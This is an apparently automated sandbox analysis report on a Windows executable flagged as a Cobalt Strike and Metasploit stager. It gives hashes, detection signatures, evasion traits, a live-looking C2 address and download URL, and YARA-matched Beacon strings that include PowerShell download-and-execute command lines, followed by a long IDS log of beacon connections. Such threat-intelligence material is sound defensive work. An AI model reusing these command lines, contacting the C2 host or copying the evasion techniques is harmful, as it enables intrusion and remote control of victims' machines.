Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7kSftA4Eoh.exe

Overview

General Information

Sample name:7kSftA4Eoh.exe
renamed because original name is a hash value
Original sample name:71f8b8789a4b0ac3f057f1468579fc23.exe
Analysis ID:1523188
MD5:71f8b8789a4b0ac3f057f1468579fc23
SHA1:2f424692dcfb5f9fe87f1e94fd2922ab3fb2143d
SHA256:a390b03e67b809b3dd08b840e3e917eb701387309c5a8859438dc926ce62ec64
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7kSftA4Eoh.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\7kSftA4Eoh.exe" MD5: 71F8B8789A4B0AC3F057F1468579FC23)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://8.130.42.227:10001/2yMe", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\r\n", "Type": "Metasploit Download", "URL": "http://8.130.42.227/2yMe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
    • 0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
    00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
        • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
        Click to see the 29 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.7kSftA4Eoh.exe.990000.1.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
          0.2.7kSftA4Eoh.exe.990000.1.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            0.2.7kSftA4Eoh.exe.990000.1.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
            • 0x2e9a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2ea1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2f185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
            • 0x2f4b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
            • 0x2f449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x2f4b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x2ea7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2ec0f:$a7: could not run command (w/ token) because of its length of %d bytes!
            • 0x2eac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2eb02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2f501:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
            • 0x2ed6f:$a11: Could not open service control manager on %s: %d
            • 0x2f2a1:$a12: %d is an x64 process (can't inject x86 content)
            • 0x2f2d1:$a13: %d is an x86 process (can't inject x64 content)
            • 0x2f5f2:$a14: Failed to impersonate logged on user %d (%u)
            • 0x2f25a:$a15: could not create remote thread in %d: %d
            • 0x2eb38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x2f208:$a17: could not write to process memory: %d
            • 0x2eda0:$a18: Could not create service %s on %s: %d
            • 0x2ee29:$a19: Could not delete service %s on %s: %d
            • 0x2ec89:$a20: Could not open process token: %d (%u)
            0.2.7kSftA4Eoh.exe.990000.1.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
            • 0x1a1f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            0.2.7kSftA4Eoh.exe.990000.1.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
            • 0x17ad2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
            • 0x18d83:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
            Click to see the 18 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T09:17:00.947197+020020337131Targeted Malicious Activity was Detected192.168.2.4497318.130.42.22710001TCP
            2024-10-01T09:17:02.228973+020020337131Targeted Malicious Activity was Detected192.168.2.4497328.130.42.22710001TCP
            2024-10-01T09:17:03.309425+020020337131Targeted Malicious Activity was Detected192.168.2.4497338.130.42.22710001TCP
            2024-10-01T09:17:04.366070+020020337131Targeted Malicious Activity was Detected192.168.2.4497348.130.42.22710001TCP
            2024-10-01T09:17:05.519622+020020337131Targeted Malicious Activity was Detected192.168.2.4497358.130.42.22710001TCP
            2024-10-01T09:17:06.606342+020020337131Targeted Malicious Activity was Detected192.168.2.4497368.130.42.22710001TCP
            2024-10-01T09:17:07.666636+020020337131Targeted Malicious Activity was Detected192.168.2.4497378.130.42.22710001TCP
            2024-10-01T09:17:08.719912+020020337131Targeted Malicious Activity was Detected192.168.2.4497388.130.42.22710001TCP
            2024-10-01T09:17:09.790001+020020337131Targeted Malicious Activity was Detected192.168.2.4497398.130.42.22710001TCP
            2024-10-01T09:17:13.878848+020020337131Targeted Malicious Activity was Detected192.168.2.4497408.130.42.22710001TCP
            2024-10-01T09:17:14.961547+020020337131Targeted Malicious Activity was Detected192.168.2.4497428.130.42.22710001TCP
            2024-10-01T09:17:16.042408+020020337131Targeted Malicious Activity was Detected192.168.2.4497448.130.42.22710001TCP
            2024-10-01T09:17:17.115300+020020337131Targeted Malicious Activity was Detected192.168.2.4497478.130.42.22710001TCP
            2024-10-01T09:17:18.198314+020020337131Targeted Malicious Activity was Detected192.168.2.4497498.130.42.22710001TCP
            2024-10-01T09:17:19.277882+020020337131Targeted Malicious Activity was Detected192.168.2.4497518.130.42.22710001TCP
            2024-10-01T09:17:20.348397+020020337131Targeted Malicious Activity was Detected192.168.2.4497528.130.42.22710001TCP
            2024-10-01T09:17:21.432830+020020337131Targeted Malicious Activity was Detected192.168.2.4497538.130.42.22710001TCP
            2024-10-01T09:17:23.040968+020020337131Targeted Malicious Activity was Detected192.168.2.4497548.130.42.22710001TCP
            2024-10-01T09:17:24.109998+020020337131Targeted Malicious Activity was Detected192.168.2.4497558.130.42.22710001TCP
            2024-10-01T09:17:25.186486+020020337131Targeted Malicious Activity was Detected192.168.2.4497568.130.42.22710001TCP
            2024-10-01T09:17:26.245359+020020337131Targeted Malicious Activity was Detected192.168.2.4497578.130.42.22710001TCP
            2024-10-01T09:17:27.329221+020020337131Targeted Malicious Activity was Detected192.168.2.4497588.130.42.22710001TCP
            2024-10-01T09:17:28.415425+020020337131Targeted Malicious Activity was Detected192.168.2.4497598.130.42.22710001TCP
            2024-10-01T09:17:29.482062+020020337131Targeted Malicious Activity was Detected192.168.2.4497608.130.42.22710001TCP
            2024-10-01T09:17:31.128011+020020337131Targeted Malicious Activity was Detected192.168.2.4497618.130.42.22710001TCP
            2024-10-01T09:17:32.766854+020020337131Targeted Malicious Activity was Detected192.168.2.4497628.130.42.22710001TCP
            2024-10-01T09:17:33.850975+020020337131Targeted Malicious Activity was Detected192.168.2.4497638.130.42.22710001TCP
            2024-10-01T09:17:34.934000+020020337131Targeted Malicious Activity was Detected192.168.2.4497648.130.42.22710001TCP
            2024-10-01T09:17:36.009885+020020337131Targeted Malicious Activity was Detected192.168.2.4497658.130.42.22710001TCP
            2024-10-01T09:17:37.091878+020020337131Targeted Malicious Activity was Detected192.168.2.4497668.130.42.22710001TCP
            2024-10-01T09:17:38.179805+020020337131Targeted Malicious Activity was Detected192.168.2.4497678.130.42.22710001TCP
            2024-10-01T09:17:39.265872+020020337131Targeted Malicious Activity was Detected192.168.2.4497688.130.42.22710001TCP
            2024-10-01T09:17:40.358668+020020337131Targeted Malicious Activity was Detected192.168.2.4497698.130.42.22710001TCP
            2024-10-01T09:17:41.456699+020020337131Targeted Malicious Activity was Detected192.168.2.4497708.130.42.22710001TCP
            2024-10-01T09:17:42.535412+020020337131Targeted Malicious Activity was Detected192.168.2.4497718.130.42.22710001TCP
            2024-10-01T09:17:43.632204+020020337131Targeted Malicious Activity was Detected192.168.2.4497728.130.42.22710001TCP
            2024-10-01T09:17:44.697946+020020337131Targeted Malicious Activity was Detected192.168.2.4497738.130.42.22710001TCP
            2024-10-01T09:17:45.952669+020020337131Targeted Malicious Activity was Detected192.168.2.4497748.130.42.22710001TCP
            2024-10-01T09:17:47.050823+020020337131Targeted Malicious Activity was Detected192.168.2.4497758.130.42.22710001TCP
            2024-10-01T09:17:48.123972+020020337131Targeted Malicious Activity was Detected192.168.2.4497768.130.42.22710001TCP
            2024-10-01T09:17:49.197763+020020337131Targeted Malicious Activity was Detected192.168.2.4497778.130.42.22710001TCP
            2024-10-01T09:17:50.296179+020020337131Targeted Malicious Activity was Detected192.168.2.4497788.130.42.22710001TCP
            2024-10-01T09:17:51.369205+020020337131Targeted Malicious Activity was Detected192.168.2.4497798.130.42.22710001TCP
            2024-10-01T09:17:52.431620+020020337131Targeted Malicious Activity was Detected192.168.2.4497808.130.42.22710001TCP
            2024-10-01T09:17:53.539482+020020337131Targeted Malicious Activity was Detected192.168.2.4497828.130.42.22710001TCP
            2024-10-01T09:17:54.689844+020020337131Targeted Malicious Activity was Detected192.168.2.4497838.130.42.22710001TCP
            2024-10-01T09:17:55.758444+020020337131Targeted Malicious Activity was Detected192.168.2.4497848.130.42.22710001TCP
            2024-10-01T09:17:56.837786+020020337131Targeted Malicious Activity was Detected192.168.2.4497858.130.42.22710001TCP
            2024-10-01T09:17:58.517597+020020337131Targeted Malicious Activity was Detected192.168.2.4497868.130.42.22710001TCP
            2024-10-01T09:17:59.583634+020020337131Targeted Malicious Activity was Detected192.168.2.4497878.130.42.22710001TCP
            2024-10-01T09:18:00.651525+020020337131Targeted Malicious Activity was Detected192.168.2.4497888.130.42.22710001TCP
            2024-10-01T09:18:01.725930+020020337131Targeted Malicious Activity was Detected192.168.2.4497898.130.42.22710001TCP
            2024-10-01T09:18:02.821096+020020337131Targeted Malicious Activity was Detected192.168.2.4497908.130.42.22710001TCP
            2024-10-01T09:18:03.911927+020020337131Targeted Malicious Activity was Detected192.168.2.4497918.130.42.22710001TCP
            2024-10-01T09:18:04.981938+020020337131Targeted Malicious Activity was Detected192.168.2.4497928.130.42.22710001TCP
            2024-10-01T09:18:06.064082+020020337131Targeted Malicious Activity was Detected192.168.2.4497938.130.42.22710001TCP
            2024-10-01T09:18:07.142989+020020337131Targeted Malicious Activity was Detected192.168.2.4497948.130.42.22710001TCP
            2024-10-01T09:18:08.247427+020020337131Targeted Malicious Activity was Detected192.168.2.4497958.130.42.22710001TCP
            2024-10-01T09:18:09.322269+020020337131Targeted Malicious Activity was Detected192.168.2.4497968.130.42.22710001TCP
            2024-10-01T09:18:10.406359+020020337131Targeted Malicious Activity was Detected192.168.2.4497978.130.42.22710001TCP
            2024-10-01T09:18:11.475283+020020337131Targeted Malicious Activity was Detected192.168.2.4497988.130.42.22710001TCP
            2024-10-01T09:18:12.557418+020020337131Targeted Malicious Activity was Detected192.168.2.4497998.130.42.22710001TCP
            2024-10-01T09:18:13.614005+020020337131Targeted Malicious Activity was Detected192.168.2.4498008.130.42.22710001TCP
            2024-10-01T09:18:14.684749+020020337131Targeted Malicious Activity was Detected192.168.2.4498018.130.42.22710001TCP
            2024-10-01T09:18:15.752081+020020337131Targeted Malicious Activity was Detected192.168.2.4498028.130.42.22710001TCP
            2024-10-01T09:18:16.838929+020020337131Targeted Malicious Activity was Detected192.168.2.4498038.130.42.22710001TCP
            2024-10-01T09:18:17.902793+020020337131Targeted Malicious Activity was Detected192.168.2.4498048.130.42.22710001TCP
            2024-10-01T09:18:19.022823+020020337131Targeted Malicious Activity was Detected192.168.2.4498058.130.42.22710001TCP
            2024-10-01T09:18:20.290340+020020337131Targeted Malicious Activity was Detected192.168.2.4498068.130.42.22710001TCP
            2024-10-01T09:18:21.351390+020020337131Targeted Malicious Activity was Detected192.168.2.4498078.130.42.22710001TCP
            2024-10-01T09:18:22.404212+020020337131Targeted Malicious Activity was Detected192.168.2.4498088.130.42.22710001TCP
            2024-10-01T09:18:23.470412+020020337131Targeted Malicious Activity was Detected192.168.2.4498098.130.42.22710001TCP
            2024-10-01T09:18:24.563314+020020337131Targeted Malicious Activity was Detected192.168.2.4498108.130.42.22710001TCP
            2024-10-01T09:18:25.624597+020020337131Targeted Malicious Activity was Detected192.168.2.4498118.130.42.22710001TCP
            2024-10-01T09:18:26.699887+020020337131Targeted Malicious Activity was Detected192.168.2.4498128.130.42.22710001TCP
            2024-10-01T09:18:27.768611+020020337131Targeted Malicious Activity was Detected192.168.2.4498138.130.42.22710001TCP
            2024-10-01T09:18:28.877591+020020337131Targeted Malicious Activity was Detected192.168.2.4498148.130.42.22710001TCP
            2024-10-01T09:18:29.989644+020020337131Targeted Malicious Activity was Detected192.168.2.4498158.130.42.22710001TCP
            2024-10-01T09:18:31.053847+020020337131Targeted Malicious Activity was Detected192.168.2.4498168.130.42.22710001TCP
            2024-10-01T09:18:32.116169+020020337131Targeted Malicious Activity was Detected192.168.2.4498178.130.42.22710001TCP
            2024-10-01T09:18:33.219289+020020337131Targeted Malicious Activity was Detected192.168.2.4498188.130.42.22710001TCP
            2024-10-01T09:18:34.334705+020020337131Targeted Malicious Activity was Detected192.168.2.4498198.130.42.22710001TCP
            2024-10-01T09:18:35.513333+020020337131Targeted Malicious Activity was Detected192.168.2.4498208.130.42.22710001TCP
            2024-10-01T09:18:39.577881+020020337131Targeted Malicious Activity was Detected192.168.2.4498218.130.42.22710001TCP
            2024-10-01T09:18:40.809481+020020337131Targeted Malicious Activity was Detected192.168.2.4498228.130.42.22710001TCP
            2024-10-01T09:18:41.920610+020020337131Targeted Malicious Activity was Detected192.168.2.4498238.130.42.22710001TCP
            2024-10-01T09:18:42.984606+020020337131Targeted Malicious Activity was Detected192.168.2.4498248.130.42.22710001TCP
            2024-10-01T09:18:44.063633+020020337131Targeted Malicious Activity was Detected192.168.2.4498258.130.42.22710001TCP
            2024-10-01T09:18:45.136440+020020337131Targeted Malicious Activity was Detected192.168.2.4498268.130.42.22710001TCP
            2024-10-01T09:18:46.218684+020020337131Targeted Malicious Activity was Detected192.168.2.4498278.130.42.22710001TCP
            2024-10-01T09:18:47.282624+020020337131Targeted Malicious Activity was Detected192.168.2.4498288.130.42.22710001TCP
            2024-10-01T09:18:48.375102+020020337131Targeted Malicious Activity was Detected192.168.2.4498298.130.42.22710001TCP
            2024-10-01T09:18:49.608325+020020337131Targeted Malicious Activity was Detected192.168.2.4498308.130.42.22710001TCP
            2024-10-01T09:18:50.703630+020020337131Targeted Malicious Activity was Detected192.168.2.4498318.130.42.22710001TCP
            2024-10-01T09:18:51.880088+020020337131Targeted Malicious Activity was Detected192.168.2.4498328.130.42.22710001TCP
            2024-10-01T09:18:53.537161+020020337131Targeted Malicious Activity was Detected192.168.2.4498338.130.42.22710001TCP
            2024-10-01T09:18:55.387877+020020337131Targeted Malicious Activity was Detected192.168.2.4498348.130.42.22710001TCP
            2024-10-01T09:18:56.475650+020020337131Targeted Malicious Activity was Detected192.168.2.4498358.130.42.22710001TCP
            2024-10-01T09:18:57.540720+020020337131Targeted Malicious Activity was Detected192.168.2.4498368.130.42.22710001TCP
            2024-10-01T09:18:58.616732+020020337131Targeted Malicious Activity was Detected192.168.2.4498378.130.42.22710001TCP
            2024-10-01T09:18:59.714059+020020337131Targeted Malicious Activity was Detected192.168.2.4498388.130.42.22710001TCP
            2024-10-01T09:19:00.832433+020020337131Targeted Malicious Activity was Detected192.168.2.4498398.130.42.22710001TCP
            2024-10-01T09:19:02.068888+020020337131Targeted Malicious Activity was Detected192.168.2.4498408.130.42.22710001TCP
            2024-10-01T09:19:03.153098+020020337131Targeted Malicious Activity was Detected192.168.2.4498418.130.42.22710001TCP
            2024-10-01T09:19:04.246598+020020337131Targeted Malicious Activity was Detected192.168.2.4498428.130.42.22710001TCP
            2024-10-01T09:19:05.506380+020020337131Targeted Malicious Activity was Detected192.168.2.4498438.130.42.22710001TCP
            2024-10-01T09:19:06.612184+020020337131Targeted Malicious Activity was Detected192.168.2.4498448.130.42.22710001TCP
            2024-10-01T09:19:07.716740+020020337131Targeted Malicious Activity was Detected192.168.2.4498458.130.42.22710001TCP
            2024-10-01T09:19:08.837611+020020337131Targeted Malicious Activity was Detected192.168.2.4498468.130.42.22710001TCP
            2024-10-01T09:19:09.922438+020020337131Targeted Malicious Activity was Detected192.168.2.4498478.130.42.22710001TCP
            2024-10-01T09:19:11.239656+020020337131Targeted Malicious Activity was Detected192.168.2.4498488.130.42.22710001TCP
            2024-10-01T09:19:12.386735+020020337131Targeted Malicious Activity was Detected192.168.2.4498498.130.42.22710001TCP
            2024-10-01T09:19:13.536698+020020337131Targeted Malicious Activity was Detected192.168.2.4498508.130.42.22710001TCP
            2024-10-01T09:19:14.618716+020020337131Targeted Malicious Activity was Detected192.168.2.4498518.130.42.22710001TCP
            2024-10-01T09:19:15.775008+020020337131Targeted Malicious Activity was Detected192.168.2.4498528.130.42.22710001TCP
            2024-10-01T09:19:16.917650+020020337131Targeted Malicious Activity was Detected192.168.2.4498538.130.42.22710001TCP
            2024-10-01T09:19:18.007050+020020337131Targeted Malicious Activity was Detected192.168.2.4498548.130.42.22710001TCP
            2024-10-01T09:19:19.142195+020020337131Targeted Malicious Activity was Detected192.168.2.4498558.130.42.22710001TCP
            2024-10-01T09:19:20.210883+020020337131Targeted Malicious Activity was Detected192.168.2.4498568.130.42.22710001TCP
            2024-10-01T09:19:21.334691+020020337131Targeted Malicious Activity was Detected192.168.2.4498578.130.42.22710001TCP
            2024-10-01T09:19:22.475180+020020337131Targeted Malicious Activity was Detected192.168.2.4498588.130.42.22710001TCP
            2024-10-01T09:19:23.599602+020020337131Targeted Malicious Activity was Detected192.168.2.4498598.130.42.22710001TCP
            2024-10-01T09:19:24.837105+020020337131Targeted Malicious Activity was Detected192.168.2.4498608.130.42.22710001TCP
            2024-10-01T09:19:25.934898+020020337131Targeted Malicious Activity was Detected192.168.2.4498618.130.42.22710001TCP
            2024-10-01T09:19:27.087377+020020337131Targeted Malicious Activity was Detected192.168.2.4498628.130.42.22710001TCP
            2024-10-01T09:19:28.172842+020020337131Targeted Malicious Activity was Detected192.168.2.4498638.130.42.22710001TCP
            2024-10-01T09:19:29.264189+020020337131Targeted Malicious Activity was Detected192.168.2.4498648.130.42.22710001TCP
            2024-10-01T09:19:30.316787+020020337131Targeted Malicious Activity was Detected192.168.2.4498658.130.42.22710001TCP
            2024-10-01T09:19:31.392561+020020337131Targeted Malicious Activity was Detected192.168.2.4498668.130.42.22710001TCP
            2024-10-01T09:19:32.464935+020020337131Targeted Malicious Activity was Detected192.168.2.4498678.130.42.22710001TCP
            2024-10-01T09:19:33.550740+020020337131Targeted Malicious Activity was Detected192.168.2.4498688.130.42.22710001TCP
            2024-10-01T09:19:34.630154+020020337131Targeted Malicious Activity was Detected192.168.2.4498698.130.42.22710001TCP
            2024-10-01T09:19:35.695994+020020337131Targeted Malicious Activity was Detected192.168.2.4498708.130.42.22710001TCP
            2024-10-01T09:19:36.920659+020020337131Targeted Malicious Activity was Detected192.168.2.4498718.130.42.22710001TCP
            2024-10-01T09:19:38.425762+020020337131Targeted Malicious Activity was Detected192.168.2.4498728.130.42.22710001TCP
            2024-10-01T09:19:39.518197+020020337131Targeted Malicious Activity was Detected192.168.2.4498738.130.42.22710001TCP
            2024-10-01T09:19:40.591060+020020337131Targeted Malicious Activity was Detected192.168.2.4498748.130.42.22710001TCP
            2024-10-01T09:19:42.136365+020020337131Targeted Malicious Activity was Detected192.168.2.4498758.130.42.22710001TCP
            2024-10-01T09:19:43.230968+020020337131Targeted Malicious Activity was Detected192.168.2.4498768.130.42.22710001TCP
            2024-10-01T09:19:44.304788+020020337131Targeted Malicious Activity was Detected192.168.2.4498778.130.42.22710001TCP
            2024-10-01T09:19:45.387293+020020337131Targeted Malicious Activity was Detected192.168.2.4498788.130.42.22710001TCP
            2024-10-01T09:19:46.467149+020020337131Targeted Malicious Activity was Detected192.168.2.4498798.130.42.22710001TCP
            2024-10-01T09:19:47.532118+020020337131Targeted Malicious Activity was Detected192.168.2.4498808.130.42.22710001TCP
            2024-10-01T09:19:48.616951+020020337131Targeted Malicious Activity was Detected192.168.2.4498818.130.42.22710001TCP
            2024-10-01T09:19:49.687932+020020337131Targeted Malicious Activity was Detected192.168.2.4498828.130.42.22710001TCP
            2024-10-01T09:19:50.784094+020020337131Targeted Malicious Activity was Detected192.168.2.4498838.130.42.22710001TCP
            2024-10-01T09:19:51.912928+020020337131Targeted Malicious Activity was Detected192.168.2.4498848.130.42.22710001TCP
            2024-10-01T09:19:52.973922+020020337131Targeted Malicious Activity was Detected192.168.2.4498858.130.42.22710001TCP
            2024-10-01T09:19:54.271035+020020337131Targeted Malicious Activity was Detected192.168.2.4498868.130.42.22710001TCP
            2024-10-01T09:19:58.400646+020020337131Targeted Malicious Activity was Detected192.168.2.4498878.130.42.22710001TCP
            2024-10-01T09:19:59.471246+020020337131Targeted Malicious Activity was Detected192.168.2.4498888.130.42.22710001TCP
            2024-10-01T09:20:00.548335+020020337131Targeted Malicious Activity was Detected192.168.2.4498898.130.42.22710001TCP
            2024-10-01T09:20:01.623607+020020337131Targeted Malicious Activity was Detected192.168.2.4498908.130.42.22710001TCP
            2024-10-01T09:20:02.745260+020020337131Targeted Malicious Activity was Detected192.168.2.4498918.130.42.22710001TCP
            2024-10-01T09:20:03.807192+020020337131Targeted Malicious Activity was Detected192.168.2.4498928.130.42.22710001TCP
            2024-10-01T09:20:04.885627+020020337131Targeted Malicious Activity was Detected192.168.2.4498938.130.42.22710001TCP
            2024-10-01T09:20:05.944846+020020337131Targeted Malicious Activity was Detected192.168.2.4498948.130.42.22710001TCP
            2024-10-01T09:20:07.026432+020020337131Targeted Malicious Activity was Detected192.168.2.4498958.130.42.22710001TCP
            2024-10-01T09:20:08.116543+020020337131Targeted Malicious Activity was Detected192.168.2.4498968.130.42.22710001TCP
            2024-10-01T09:20:09.189258+020020337131Targeted Malicious Activity was Detected192.168.2.4498978.130.42.22710001TCP
            2024-10-01T09:20:10.271995+020020337131Targeted Malicious Activity was Detected192.168.2.4498988.130.42.22710001TCP
            2024-10-01T09:20:11.341983+020020337131Targeted Malicious Activity was Detected192.168.2.4498998.130.42.22710001TCP
            2024-10-01T09:20:13.189833+020020337131Targeted Malicious Activity was Detected192.168.2.4499008.130.42.22710001TCP
            2024-10-01T09:20:14.262971+020020337131Targeted Malicious Activity was Detected192.168.2.4499018.130.42.22710001TCP
            2024-10-01T09:20:15.316609+020020337131Targeted Malicious Activity was Detected192.168.2.4499028.130.42.22710001TCP
            2024-10-01T09:20:16.386558+020020337131Targeted Malicious Activity was Detected192.168.2.4499038.130.42.22710001TCP
            2024-10-01T09:20:17.480378+020020337131Targeted Malicious Activity was Detected192.168.2.4499048.130.42.22710001TCP
            2024-10-01T09:20:18.554731+020020337131Targeted Malicious Activity was Detected192.168.2.4499058.130.42.22710001TCP
            2024-10-01T09:20:19.621581+020020337131Targeted Malicious Activity was Detected192.168.2.4499068.130.42.22710001TCP
            2024-10-01T09:20:21.232159+020020337131Targeted Malicious Activity was Detected192.168.2.4499078.130.42.22710001TCP
            2024-10-01T09:20:22.303033+020020337131Targeted Malicious Activity was Detected192.168.2.4499088.130.42.22710001TCP
            2024-10-01T09:20:23.376704+020020337131Targeted Malicious Activity was Detected192.168.2.4499098.130.42.22710001TCP
            2024-10-01T09:20:24.495821+020020337131Targeted Malicious Activity was Detected192.168.2.4499108.130.42.22710001TCP
            2024-10-01T09:20:25.565805+020020337131Targeted Malicious Activity was Detected192.168.2.4499118.130.42.22710001TCP
            2024-10-01T09:20:26.660847+020020337131Targeted Malicious Activity was Detected192.168.2.4499128.130.42.22710001TCP
            2024-10-01T09:20:27.739974+020020337131Targeted Malicious Activity was Detected192.168.2.4499138.130.42.22710001TCP
            2024-10-01T09:20:28.809816+020020337131Targeted Malicious Activity was Detected192.168.2.4499148.130.42.22710001TCP
            2024-10-01T09:20:29.972968+020020337131Targeted Malicious Activity was Detected192.168.2.4499158.130.42.22710001TCP
            2024-10-01T09:20:31.062763+020020337131Targeted Malicious Activity was Detected192.168.2.4499168.130.42.22710001TCP
            2024-10-01T09:20:32.150805+020020337131Targeted Malicious Activity was Detected192.168.2.4499178.130.42.22710001TCP
            2024-10-01T09:20:36.248804+020020337131Targeted Malicious Activity was Detected192.168.2.4499188.130.42.22710001TCP
            2024-10-01T09:20:37.336700+020020337131Targeted Malicious Activity was Detected192.168.2.4499198.130.42.22710001TCP
            2024-10-01T09:20:38.408916+020020337131Targeted Malicious Activity was Detected192.168.2.4499208.130.42.22710001TCP
            2024-10-01T09:20:40.072859+020020337131Targeted Malicious Activity was Detected192.168.2.4499218.130.42.22710001TCP
            2024-10-01T09:20:41.148707+020020337131Targeted Malicious Activity was Detected192.168.2.4499228.130.42.22710001TCP
            2024-10-01T09:20:42.228856+020020337131Targeted Malicious Activity was Detected192.168.2.4499238.130.42.22710001TCP
